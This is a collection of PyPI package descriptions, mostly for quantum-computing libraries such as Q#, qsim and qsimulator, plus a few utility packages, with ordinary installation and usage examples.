\u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430:{response.status_code}\")# \u0413\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u043e\u0435 \u0447\u0438\u0441\u043b\u043e \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u0435\u0433\u043e \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438random_number=random.randint(1,100)config.set_value('random','random_number',str(random_number))config.save()\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u043d\u0430GitHub.\u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e\u041f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0439\u0442\u0435\u0441\u044c \u043a \u043d\u0430\u0448\u0435\u043c\u0443 \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0443 \u043d\u0430Discord, \u0433\u0434\u0435 \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0437\u0430\u0434\u0430\u0442\u044c 
\u0432\u043e\u043f\u0440\u043e\u0441\u044b, \u043e\u0431\u0441\u0443\u0434\u0438\u0442\u044c \u043f\u0440\u043e\u0435\u043a\u0442 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443 \u043e\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\u0412\u0435\u0431-\u0441\u0430\u0439\u0442\u041f\u043e\u0441\u0435\u0442\u0438\u0442\u0435\u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043f\u0440\u043e\u0435\u043a\u0442\u0430qs-files\u0434\u043b\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432.\u041b\u0438\u0446\u0435\u043d\u0437\u0438\u044f\u042d\u0442\u043e\u0442 \u043f\u0440\u043e\u0435\u043a\u0442 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0435\u0439 MIT. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0432 \u0444\u0430\u0439\u043b\u0435LICENSE.\u0410\u0432\u0442\u043e\u0440\u041f\u0440\u043e\u0435\u043a\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043dQuadrat.Ik.\u0421\u0432\u044f\u0437\u0430\u0442\u044c\u0441\u044f \u0441 \u043d\u0430\u043c\u0438\u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u0435\u0441\u0442\u044c \u0432\u043e\u043f\u0440\u043e\u0441\u044b \u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u043d\u0435 \u0441\u0442\u0435\u0441\u043d\u044f\u0439\u0442\u0435\u0441\u044c \u0441\u0432\u044f\u0437\u0430\u0442\u044c\u0441\u044f \u0441 \u043d\u0430\u043c\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443quadrat.ik@yandex.com."} +{"package": "qsgen", "pacakge-description": "UNKNOWN"} +{"package": "qsh", "pacakge-description": "No description available on PyPI."} +{"package": "qshader", "pacakge-description": "Powerful shading support for PyQt5..#thread QTimer 10#pre_define hue 0#import PyQt5.QtGui QColor#begin_shaderColor1=QColor.fromHsv(hue,50,200)Color2=QColor.fromHsv((hue+30)%360,50,220)Color3=QColor.fromHsv((hue+60)%360,50,240)if@@UNDER_MOUSE:Gradient=f\"qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0{Color1.name()}, stop:{@@MOUSE_POSITION_WIDGET.x()/$$parent.width()}{Color2.name()}, stop:1{Color3.name()})\"else:Gradient=f\"qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0{Color1.name()}, stop:0.5{Color2.name()}, stop:1{Color3.name()})\"$$style(f\"background:{Gradient}; color: white; border: 0px solid; border-radius: 1px; font-size: 18px; padding: 15px;\")$$effect(BloomEffect,100,QColor.fromRgb(Color1.red(),Color2.green(),Color3.blue(),@@RGB_MAX))hue=(hue+1)%360#end_shader#thread QTimer 10#pre_define hue 0#import PyQt5.QtGui QColor#begin_shadercolor=QColor.fromHsv(hue,@@RGB_MAX,@@RGB_MAX)$$style(f'background-color:{color.name()}; color: black; border: 0px; font-size: 20px; padding: 30px;')$$effect(BloomEffect,250,color)$$parent.setText(color.name())hue=(hue+(2if@@UNDER_MOUSEelse1))%360#end_shaderWARNING: QShader is in ALPHA state, please be patient and report all bugs.QShader Documentation.QTS Documentation.QShader V1.0.0-ALPHA."} +{"package": "qsharp", "pacakge-description": "Q# Language Support for PythonQ# is an open-source, high-level programming language for developing and running quantum algorithms.\nTheqsharppackage for Python 
provides interoperability with the Q# interpreter, making it easy\nto simulate Q# programs within Python.InstallationTo install the Q# language package, run:pipinstallqsharpUsageFirst, import theqsharpmodule:importqsharpThen, use the%%qsharpcell magic to run Q# directly in Jupyter notebook cells:%%qsharp\n\nopen Microsoft.Quantum.Diagnostics;\n\n@EntryPoint()\noperation BellState() : Unit {\n use qs = Qubit[2];\n H(qs[0]);\n CNOT(qs[0], qs[1]);\n DumpMachine();\n ResetAll(qs);\n}\n\nBellState()SupportFor more information about the Azure Quantum Development Kit, visithttps://aka.ms/AQ/Documentation.ContributingQ# welcomes your contributions! Visit the Q# GitHub repository at [https://github.com/microsoft/qsharp] to find out more about the project."} +{"package": "qsharp-chemistry", "pacakge-description": "Q# Chemistry Library for PythonTheqsharp-chemistrypackage for Python provides interoperability with Microsoft Quantum Development Kit's Chemistry Library.For details on how to get started with Python and Q#, please see theGetting Started with Python guide.For details about the Quantum Chemistry Library, please see theIntroduction to the Quantum Chemistry Library articlein our online documentation.You can also try ourQuantum Computing Fundamentalslearning path to get familiar with the basic concepts of quantum computing, build quantum programs, and identify the kind of problems that can be solved.Installing with AnacondaIf you use Anaconda or Miniconda, installing theqsharppackage will automatically include all dependencies:condainstall-cquantum-engineeringqsharpInstalling from SourceIf you'd like to contribute to or experiment with the Python interoperability feature, it may be useful to install from source rather than from theqsharp-chemistrypackage on the Python Package Index (PyPI).\nTo do so, make sure that you are in thePython/qsharp-chemistrydirectory, and runsetup.pywith theinstallargument:cdPython/qsharp-chemistry\npythonsetup.pyinstallBuilding theqsharp-chemistryPackageThe Python interoperability feature uses a standardsetuptools-based packaging strategy.\nTo build a platform-independent wheel, run the setup script withbdist_wheelinstead:cdPython/qsharp-chemistry\npythonsetup.pybdist_wheelBy default, this will create aqsharp-chemistrywheel indist/with the version number set to 0.0.0.1.\nTo provide a more useful version number, set thePYTHON_VERSIONenvironment variable before runningsetup.py.Support and Q&AIf you have questions about the Quantum Development Kit and the Q# language, or if you encounter issues while using any of the components of the kit, you can reach out to the quantum team and the community of users inStack Overflowand inQuantum Computing Stack Exchangetagging your questions withq#."} +{"package": "qsharp-core", "pacakge-description": "Q# Interoperability for PythonTheqsharp-corepackage for Python provides interoperability with the Quantum Development Kit and with the Q# language, making it easy to simulate Q# operations and functions from within Python.For details on how to get started with Python and Q#, please see theGetting Started with Python guide.You can also try ourQuantum Computing Fundamentalslearning path to get familiar with the basic concepts of quantum computing, build quantum programs, and identify the kind of problems that can be solved.Installing with AnacondaIf you use Anaconda or Miniconda, installing theqsharppackage will automatically include all dependencies:condainstall-cquantum-engineeringqsharpInstalling from SourceIf you'd like to 
contribute to or experiment with the Python interoperability feature, it may be useful to install from source rather than from theqsharp-corepackage on the Python Package Index (PyPI).\nTo do so, make sure that you are in thePythondirectory, and runsetup.pywith theinstallargument:cdiqsharp/src/Python/\npythonsetup.pyinstallBuilding theqsharp-corePackageThe Python interoperability feature uses a standardsetuptools-based packaging strategy.\nTo build a platform-independent wheel, run the setup script withbdist_wheelinstead:cdiqsharp/src/Python/\npythonsetup.pybdist_wheelBy default, this will create aqsharp-corewheel indist/with the version number set to 0.0.0.1.\nTo provide a more useful version number, set thePYTHON_VERSIONenvironment variable before runningsetup.py.Support and Q&AIf you have questions about the Quantum Development Kit and the Q# language, or if you encounter issues while using any of the components of the kit, you can reach out to the quantum team and the community of users inStack Overflowand inQuantum Computing Stack Exchangetagging your questions withq#."} +{"package": "qsharp-jupyterlab", "pacakge-description": "Q# Language Support for JupyterLabQ# is an open-source, high-level programming language for developing and running quantum algorithms.\nTheqsharp-jupyterlabextension provides syntax highlighting for Q# documents and Q# notebook\ncells in JupyterLab.InstallationTo install the Q# JupyterLab extension, run:pipinstallqsharp-jupyterlabTo run Q# in Jupyter notebooks, remember to also install theqsharppackage: [https://pypi.org/project/qsharp].SupportFor more information about the Azure Quantum Development Kit, visithttps://aka.ms/AQ/Documentation.ContributingQ# welcomes your contributions! Visit the Q# GitHub repository at [https://github.com/microsoft/qsharp] to find out more about the project."} +{"package": "qsharp-lang", "pacakge-description": "Q# Language Support for PythonQ# is an open-source, high-level programming language for developing and running quantum algorithms.\nTheqsharp-langpackage for Python provides interoperability with the Q# interpreter, making it easy\nto simulate Q# programs within Python.InstallationTo install the Q# language package, run:pipinstallqsharp-langUsageFirst, import theqsharpmodule:importqsharpThen, use the%%qsharpcell magic to run Q# directly in Jupyter notebook cells:%%qsharp\n\nopen Microsoft.Quantum.Diagnostics;\n\n@EntryPoint()\noperation BellState() : Unit {\n use qs = Qubit[2];\n H(qs[0]);\n CNOT(qs[0], qs[1]);\n DumpMachine();\n ResetAll(qs);\n}\n\nBellState()SupportFor more documentation and to browse issues, please visit the Q# project wiki at [https://github.com/microsoft/qsharp/wiki].ContributingQ# welcomes your contributions! 
Visit the Q# GitHub repository at [https://github.com/microsoft/qsharp] to find out more about the project."} +{"package": "qsharp-preview", "pacakge-description": "Q# Python Bindings"} +{"package": "qsharp_python", "pacakge-description": "Q# Python Bindings"} +{"package": "qsharp-widgets", "pacakge-description": "No description available on PyPI."} +{"package": "qshell", "pacakge-description": "No description available on PyPI."} +{"package": "qsignal", "pacakge-description": "QSignal \u2013 A QT Signal/slot for pythonThis project provides easy to use Signal class for implementing Signal/Slot mechanism in Python.\nIt does not implement it strictly but rather creates the easy and simple alternative.ClassesSignalqsignal.Signalis the main class.To create a signal, just make asig = qsignal.Signaland set up an emitter of it. Or create it withsig = qsignal.Signal(emitter=foo).To emit it, just call yoursig().\nOr emit it in asynchronous mode with the methodasync.Example:>>> from qsignal import Signal>>> # Creating signal\n>>> sig = Signal()>>> # Or\n>>> myobject.signal = Signal(emitter=myobject)>>> # Connecting to signals\n>>> sig.connect(callback)\n>>> myobject.signal.connect(sig)\n>>> myobject.signal.connect(otherobject.callback_method)>>> # Emitting\n>>> sig()\n>>> myobject.signal('argument(s)', optional=True)>>> # Emitting in asynchronous mode\n>>> sig.async()To connect slots to it, pass callbacks intoconnect. The connections are maintained throughweakref, thus\nyou don\u2019t need to search for them and disconnect whenever you\u2019re up to destroy some object.SignallerThe base class for objects to maintain their Signals.The only purpose of this class is to automate Signal names and emitter references.>>> from qsignal import Signal, Signaller>>> # For example, this is a class...\n>>> class MyClass(Signaller):\n>>> my_signal = Signal()>>> # This is a slot...\n>>> def my_slot():\n>>> sig = Signal.emitted()\n>>> assert sig.name == my_signal\n>>> assert sig.emitter.__class__ == MyClass>>> # And the connections...\n>>> o = MyClass()\n>>> o.my_signal.connect(my_slot)\n>>> #...\n>>> o.my_signal()"} +{"package": "qsilver", "pacakge-description": "QSilverQSilver is a tiny python library, which provides api to run multiply tasks concurrent in only one thread using async/await syntax.InstallationYou can install QSilver via pip:pipintallqsilverUsageimportqsilverasyncdefexample():print(\"Hello\")awaitqsilver.sleep(1)print(\"World!\")qsilver.create_scheduler()qsilver.add_coroutine(example())qsilver.run_forever()LicenseMIT"} +{"package": "qsim", "pacakge-description": "QSimA simple simulator for quantum circuits."} +{"package": "qsimcirq", "pacakge-description": "qsim and qsimhQuantum circuit simulators qsim and qsimh. These simulators were used for cross\nentropy benchmarking in[1].[1], F. Arute et al,\n\"Quantum Supremacy Using a Programmable Superconducting Processor\",\nNature 574, 505, (2019).qsimqsim is a Schr\u00f6dinger full state-vector simulator. It computes all the2namplitudes of the state vector, wherenis the number of qubits.\nEssentially, the simulator performs matrix-vector multiplications repeatedly.\nOne matrix-vector multiplication corresponds to applying one gate.\nThe total runtime is proportional tog2n, wheregis the number of\n2-qubit gates. To speed up the simulator, we use gate fusion[2][3],\nsingle precision arithmetic, AVX/FMA instructions for vectorization and OpenMP\nfor multi-threading.[2]M. Smelyanskiy, N. P. Sawaya,\nA. 
Aspuru-Guzik, \"qHiPSTER: The Quantum High Performance Software Testing\nEnvironment\", arXiv:1601.07195 (2016).[3]T. H\u00e4ner, D. S. Steiger,\n\"0.5 Petabyte Simulation of a 45-Qubit Quantum Circuit\", arXiv:1704.01127\n(2017).qsimhqsimh is a hybrid Schr\u00f6dinger-Feynman simulator[4]. The lattice is split into two parts\nand the Schmidt decomposition is used to decompose 2-qubit gates on the\ncut. If the Schmidt rank of each gate ismand the number of gates on\nthe cut iskthen there aremkpaths. To simulate a circuit with\nfidelity one, one needs to simulate all themkpaths and sum the results.\nThe total runtime is proportional to(2n1+ 2n2)mk, wheren1andn2are the qubit numbers in the first and second parts. Path\nsimulations are independent of each other and can be trivially parallelized\nto run on supercomputers or in data centers. Note that one can run simulations\nwith fidelityF < 1just by summing over a fractionFof all the paths.A two level checkpointing scheme is used to improve performance. Say, there\narekgates on the cut. We split those into three parts:p+r+s=k, wherepis the number of \"prefix\" gates,ris the number of \"root\" gates andsis the number of \"suffix\" gates. The first checkpoint is executed after\napplying all the gates up to and including the prefix gates and the second\ncheckpoint is executed after applying all the gates up to and including the\nroot gates. The full summation over all the paths for the root and suffix gates\nis performed.Ifp>0then one such simulation givesF \u2248 m-p(for all the\nprefix gates having the same Schmidt rankm). One needs to runmpsimulations with different prefix paths and sum the results to getF = 1.[4]I. L. Markov, A. Fatima, S. V. Isakov,\nS. Boixo, \"Quantum Supremacy Is Both Closer and Farther than It Appears\",\narXiv:1807.10749 (2018).C++ UsageThe code is basically designed as a library. The user can modify sample\napplications inappsto meet their own needs. The usage of sample applications is described in thedocs.Input formatThe circuit input format is described in thedocs.NOTE: This format is deprecated, and no longer actively maintained.Sample CircuitsA number of sample circuits are provided incircuits.Unit testsUnit tests for C++ libraries use the Google test framework, and are\nlocated intests.\nPython tests use pytest, and are located inqsimcirq_tests.To build and run all tests, run:make run-testsThis will compile all test binaries to files with.xextensions, and run each\ntest in series. Testing will stop early if a test fails. It will also run tests\nof theqsimcirqpython interface. To run C++ or python tests only, runmake run-cxx-testsormake run-py-tests, respectively.To clean up generated test files, runmake cleanfrom the test directory.Cirq UsageCirqis a framework for modeling and\ninvoking Noisy Intermediate Scale Quantum (NISQ) circuits.To get started simulating Google Cirq circuits with qsim, see thetutorial.More detailed information about the qsim-Cirq API can be found in thedocs.DisclaimerThis is not an officially supported Google product.How to cite qsimQsim is uploaded to Zenodo automatically. 
Click on this badgeto see all the citation formats for all versions.An equivalent BibTex format reference is below for all the versions:@software{quantum_ai_team_and_collaborators_2020_4023103,\n author = {Quantum AI team and collaborators},\n title = {qsim},\n month = Sep,\n year = 2020,\n publisher = {Zenodo},\n doi = {10.5281/zenodo.4023103},\n url = {https://doi.org/10.5281/zenodo.4023103}\n}"} +{"package": "qsimov-cloud-client", "pacakge-description": "Unlock Quantum Potential with Neighborhood Quantum Superposition!\ud83c\udf0c Welcome to a new era of quantum computing! \ud83c\udf0cAre you ready to elevate your quantum algorithms to unprecedented heights? IntroducingNeighborhood Quantum Superpositiona cutting-edge service designed to revolutionize your quantum computations.What isNeighborhood Quantum Superposition?Neighborhood Quantum Superpositionis not just a service; it's a quantum leap into enhanced efficiency and performance. This groundbreaking offering provides a diverse range of superposition options, allowing you to tailor quantum states precisely to your algorithm's needs.Key Features:\ud83d\ude80Versatility:Choose from various superposition types to optimize your quantum computations.\ud83e\udde0Efficiency Boost:Achieve superior algorithmic performance with strategically crafted superpositions.\u2699\ufe0fFlexible Integration:Seamlessly integrateNeighborhood Quantum Superpositioninto your existing quantum workflows.\ud83c\udf10Cloud-Powered:Harness the power of quantum superposition conveniently through our cloud-based platform.How It Works:Neighborhood Quantum Superpositionleverages advanced quantum algorithms to generate highly efficient superposition states. Whether you're exploring optimization problems, simulating quantum systems, or running complex quantum circuits, this service empowers you to unlock the full potential of quantum computing. Here you can see a visual example!!Get Started Today with Qsimov Cloud Client!Qsimov Cloud Client is a tool designed to facilitate interaction with Qsimov'sNeighborhood Quantum Superpositionservices. This client allows you to connect to the company's services and leverage the capabilities ofNeighborhood Quantum Superpositionfor your quantum computing needs.InstallationTo install the Qsimov Python Client, use the following pip command:pipinstallqsimov-cloud-clientBasic Usagefromqsimov_cloud_clientimportQsimovCloudClient# Initialize QsimovCloudClient with your access tokenclient=QsimovCloudClient(\"your_access_token\")# Set parameters for the serviceclient.set_metric(\"ample\")client.set_state(state_bin='0111010')client.set_distances([\"0\",\"9/4\",\"inf\"])client.can_have_nan(False)client.set_ancilla_mode(\"clean\")# Generate a quantum circuitcircuit_superposition=client.generate_circuit()# Access the resultprint(\"The resulting circuit in qasm is:\",circuit_superposition.get_qasm_code())# Additional usage examples can be found in the documentation.Don't miss out on the quantum revolution! Enhance your algorithms with Neighborhood Quantum Superposition and experience the future of quantum computing today.Ready to elevate your quantum computations?Visit QSimov!\ud83d\ude80Neighborhood Quantum Superposition - Transforming Quantum Computing!\ud83d\ude80"} +{"package": "qsimov-Mowstyl", "pacakge-description": "QSimov is a quantum computer simulator based on the circuit model."} +{"package": "qsimulator", "pacakge-description": "1. 
QUICK START1.2\tTUTORIAL INTRODUCTION(see accompanying helloworld.py)\nLets start with a simple example of using qsim, something like a 'hello world' --import qsim\nqc = qsim.QSimulator(8)\nqc.qgate(qsim.H(),[0])\nqc.qgate(qsim.C(),[0,3])\nqc.qreport()\nqc.qmeasure([0])\nqc.qreport()When run, the above code generates the following output (since measuring randomly collapses to some state per its probability, there is 50% chance you might see the final state as 00000000) --State\n00000000\u00a0\u00a0\u00a0 0.70710678+0.00000000j\n00001001\u00a0\u00a0\u00a0 0.70710678+0.00000000j\n\nState\n00001001\u00a0\u00a0\u00a0 1.00000000+0.00000000jWith respect to the functionality, the above code starts with an 8-qubit system, and then sets up qubits 3 and 0 entangled in bell state |Phi+>. And then measures qubit 0. This is depicted in the diagram below --7 -------------------------\n6 -------------------------\n5 -------------------------\n4 -------------------------\n3 -----O-------------------\n2 -----|-------------------\n1 -----|-------------------\n0 -[H]-.-(/)---------------(Using (/) to depict the measurement operation.)The output emitted by the above code is the dump of the state right after the setting up of the |Phi+> state, and then after measuring the qubit 0.Lets go line by line to understand the code --import qsimThis first line imports the qsim. Fairly straight forward.qc = qsim.QSimulator(8)The main class in qsim is QSimulator. This line creates an instance of that class. As a convention in this document, qc is always used to represent an instance of the class QSimulator. The QSimulator class instance, qc, represents a quantum computer. The number 8 as the argument to the constructor of class QSimulator, specifies the number of qubits in that quantum computer.qc.qgate(qsim.H(),[0])qgate() is the function that applies a quantum gate on a given set of qubits in the system. In the above line of code, it applies the hadamard gate (H()), to qubit 0. See the documentation below for the gates available.qc.qgate(qsim.C(),[0,3])Here a CNOT gate (C()) is applied on bits 0 and 3, with qubit 0 being the control qubit. In QSimulator the C gate is defined to take the first qubit as the control qubit.qc.qreport()The function qreport() outputs the current superposition state. The first batch of lines is that output.qc.qmeasure([0])The qmeasure() function measures qubit 0.qc.qreport()This last qreport() function call outputs the state after the measurement of the qubit 0.\n\u00a0\nNow, let us run the same code with trace turned on (therefore removed the qreport() calls). 
Turning trace ON, it outputs the state after init and each gate and measurement steps (see accompanying helloworld_traceON.py) --import qsim\nfrom qgates import *\nqc = qsim.QSimulator(8, qtrace=True)\nqc.qgate(qsim.H(),[0])\nqc.qgate(qsim.C(),[0,3])\nqc.qmeasure([0])and, here is its output --Initial State\n00000000 1.00000000+0.00000000j\n\nHADAMARD Qubit[0]\n00000000 0.70710678+0.00000000j\n00000001 0.70710678+0.00000000j\n\nCNOT Qubit[0, 3]\n00000000 0.70710678+0.00000000j\n00001001 0.70710678+0.00000000j\n\nMEASURED Qubit[0] = [0] with probality = 0.5\n00000000 1.00000000+0.00000000j1.2\tPROGRAMMING MODELqsim assumes a programming model as shown below.Users write the algorithms on a front-end classical computer using standard programming language (Python), and qsim provides an API to access and perform operations on a Quantum Computer as a back-end resource.+--------------------+ +----------------+\n | +---| | |\n +-------+ | | q | | |\n | | | Classical | s | | Quantum |\n | |--------| Computer | i |----------| Computer |\n +-------+ | (Front-end) | m | | (Back-end) |\n / / | | | | |\n --------- | +---| | |\n +--------------------+ +----------------+2. CORE FUNCTIONS2.1qc = qsim.QSimulator(nqubits, ncbits=None, initstate=None, prepqubits=None, qtrace=False, qzeros=False, validation=False, visualize=False)First argument specifies the number of qubits in the system. If ncbits is provided it specifies the number of classical bits, if not provide, it defaults to same as the number of qubits. If neither initstate or prepqubits is provided, prepares all qubits to |0>.Argument 'prepqubits' can be provided to initialize the initial state by providing the states of all individual qubits in the system. The structure to use is a list, example [[a,b],[c,d], ... [x,y]]. Note that [a,b] is the MSB.Argument 'initstate' can be used to pass an initial state as a numpy.matrix of shape (2**nqubits,1). Also, the initstate should have the amplitudes normalized. See accompanying initialize-state.py for an example. Creating an initstate vector requires more involed coding, but can come in handy when the initial state is required to have very custom distribution of amplitudes - e.g., in case of trying to setup the initial state for testing QFT.If 'initstate' is provided, any provided 'prepqubits' is ignored.If qtrace=True, it causes each gate and measurement operation to emit the resulting state.If qzeros=True, prints even those whose amplitude is 0.If validation=True, every qgate() call validates the gate to be unitaryIf visualize=True, the qreport() displays an additional bar graph showing the magnitude of the amplitudes of each state.2.2qc.qreset()Brings the simulator to the same state as after QSimulator() call - initial state, qtrace, qzeros, ... everything.2.3qc.qgate(gate_function, list_of_qubits, qtrace=False)qgate() is used to perform quantum gate operations on a set of qubits.There are a number of gates pre-created within the qgates module, and additional gates can be defined by the users (see Section USER DEFINED GATE below). If a gate operates on more than 1 qubit (e.g., CNOT gate, SWAP gate, etc.) 
then the list in the second argument (list_of_qubits) must contain that many qubits.The function qgate() validates the number of bits passed in list_of_qubits against the number of qubits required for the gate, if not correct, throws an exception.If qtrace is True, the resulting state is printed out.2.4qc.qmeasure(qbit_list, cbit_list=None, qtrace=False)Returns the measured values of the qubits in the qubit_list, each 0 or 1, as a list, in the same order as the qubits in the qubit_list. The measured qubits are also read into the corresponding classical bits in the cbit_list. if cbit_list is not specified it defaults to the same list as the qbit_list.If the bits are in a superposition, the measurement operation will cause the state to randomly collapse to one or the other with the appropriate probability. In this simulator, the Python random.random() function is used to generate the randomness to decide which state to collapse into.To measure in some basis, you can apply corresponding operation (gate) to the qbits in question, measure, and then apply the inverse of that operation to those qbits.Cleary, the computations can continue after the measurement operations. Just that the overall state will have the appropriately collapsed state of the measured qubits.If qtrace is True, the resulting state is printed out.2.5qc.qreport(state=None, header=\"State\", probestates=False)Prints the current state of the system. if state argument is provided with a column numpy.matrix, it prints that state instead.\nThe argument header provides the text to be printed above the state information.\nThe argument probestates is used to limit the dumping of states information, it gets limited to only the states listed, e.g., probestates=[0,1,2,3]2.6qc.qsnapshot()Returns the a python array of all the classical bits and a python array of complex amplitudes of superposition states of the qubits in the system.2.7qc.qsize()Returns the number of qubits in the system.2.8qc.qtraceON(boolean)Turns ON or OFF printing of state after each qgate() and qmeasure() function call.2.9qc.qzerosON(boolean)Turns ON or OFF printing of zero amplitude states in trace outputs and qreport() outputs.3. OPERATOR UTILITY FUNCTIONS3.1qsim.qstretch(gate_function, list_of_qubits)qstretch takes a gate and an ordered list of qubits on which it would operate and \"stretches\" it to handleallqubits in the system. Basically, the resulting newgate takes as input all the qubits in the system provided as [msb,...,lsb], but performs the original operation only on the given list_of_qubits, and passes through all the other qubits unaffected.For instance, lets assume we created a 4 qubit system (qsim.QSimulator(4)), and in that we use C gate on qubits 3 and 0 (qgate(C(),[3,0])). Shown on the left side of the figure below. qstretch takes the same arguments and creates a gate that operates on 4 qubits, but still affects only qubits 3 and 0, passing the others through.+---+\n 3 ---.----- 3 --| . |--\n | | | |\n 2 ---|----- 2 --| | |--\n | | | |\n 1 ---|----- 1 --| | |--\n | | | |\n 0 ---O----- 0 --| O |--\n +---+\n\nqc.qgate(C(),[3,0])\u00a0 ng = qc.qstretch(C(),[3,0])\n qc.qgate(ng,[3,2,1,0])qstretch() is useful in cases where you want to make a 'blackbox' function which does an equivalent of a series of operations in one go (see the accompanying bern_vazy.py). To do that you would typically use qcombine_seq()'s and qcombine_par()'s in conjunction with qstretch()'s.3.2qsim.qinverse(op,name=None)Returns the inverse of the operator. 
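For example, the inverse returned by qinverse() can be applied right after the original gate to undo it; a minimal sketch that assumes only the calls documented in this description:

```python
# Minimal sketch (assumes the qsim API documented above): undoing a phase rotation
# with the inverse gate returned by qsim.qinverse().
import numpy
import qsim

qc = qsim.QSimulator(4)
qc.qgate(qsim.H(), [2])            # put qubit 2 in superposition so the rotation is visible
rot = qsim.R(numpy.pi / 4)         # phase rotation by pi/4
rot_inv = qsim.qinverse(rot)       # inverse gate; its default name is derived from the original (see below)
qc.qgate(rot, [2])
qc.qgate(rot_inv, [2])             # qubit 2 is back to the state it had before the rotation
qc.qreport()
```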
If name argument is not provided, it generates a name by prefixing the name of the provided operator with \"INV-\"3.3qsim.qisunitary(op)Checks if the provided operator is unitary opperator or not. Returns boolean value (True or False).4. Gates in qsim4.1\tPRE-DEFINED GATESA number of gates are pre-defined in the QSimulator class. The following is the list --H()\t\tHadamard gate\nX()\t\tPauli_x gate\nY()\t\tPauli_y gate\nZ()\t\tPauli_z gate\nR(phi)\t\tPhase rotation by phi\nRk(k)\t\tPhase rotation by 2*pi/(2**k), useful in QFT algorithm\nC()\t\tCNOT gate\nSWAP()\t\tSWAP gate\nCSWAP()\t\tControlled-SWAP gate\nSQSWAP()\tSquare root of SWAP gate\nT()\t\tTOFFOLI gate\nHn(n)\t\tHadamard gates applied on n qubits, added since it is commonly used\nQFT(n)\t\tQFT gate for n qubits\nRND()\t\tRandomizes the qubit - useful for testing some cases4.2\tCONTROLLED GATESCTL(op,name=None)\nBuild a controlled gate from any gate, MSB position as control bit. Can apply CTL() multiple times e.g., CTL(CTL(op)), to add multiple control qubits.Examples:\nC() is the same as qsim.CTL(qsim.X(),name=\"CNOT\")\nT() is the same as qsim.CTL(qsim.CTL(qsim.X()),name=\"TOFFOLI\")4.3 OPERATOR UTILITY FUNCTIONS4.3.1qsim.qcombine_seq(name, op_list)Combines a sequential application of gates into one equivalent gate. The argument name is the name of the resulting gate. Argument op_list is a list of gates each of the structure [name,matrix].--[A]--[B]--[C]--[D]--\u00a0\u00a0\u00a0 ==>\u00a0\u00a0 --[G]--To combine the aboveG = qsim.qcombine_seq(\"SEQ\",[A,B,C,D])and to use it, for instance to apply it on qubit 2\n\u00a0\nqc.qgate(G,[2])4.3.2qsim.qcombine_par(name, op_list)Combines a parallel application of gates into one equivalent gate. The argument name is the name of the resulting gate. Argument op_list is a list of gates.+-+\n3 --[A]---- 3 --| |--\n2 --[B]---- ==> 2 --| |--\n1 --[C]---- 1 --|G|--\n0 --[D]---- 0 --| |--\n +-+To combine the above into one operation with 4 qubits as inputsG = qsim.qcombine_par(\"PAR\",[A,B,C,D])and to use it, for example to apply it on qubits 7,5,3,1qc.qgate(G,[7,5,3,1])An illustrative example is+--+\n1 --[H]---- 1 --|\u00a0 |--\n |H2|\n0 --[H]---- 0 --|\u00a0 |--\n +--+\nH2 = qsim.qcombine_par(\"H2\",[qsim.H(),qsim.H()])\n\n +--+\n3 ---.----- 3 --|\u00a0 |--\n | |\u00a0 |\n2 ---O----- 2 --|\u00a0 |--\n |C2|\n1 ---.----- 1 --|\u00a0 |--\n | |\u00a0 |\n0 ---O----- 0 --|\u00a0 |--\n +--+\nC2 = qsim.qcombine_par(\"C2\",[qsim.C(),qsim.C()])Create 2 entangled |Phi+> bell states, between quits 7,6 and 5,4 using these --qc.qgate(H2,[7,5])\nqc.qgate(C2,[7,6,5,4])5. CREATING USER DEFINED GATES(see accompanying user_def_gates.py)Qcsim allows using user defined gates. A user defined gate would be written as a function that returns a Python array with two elements [name_string, unitary_matrix]. The element unitary_matrix is the matrix that specifies the gate. It should be created using numpy.matrix([...],dtype=complex), or equivalent. 
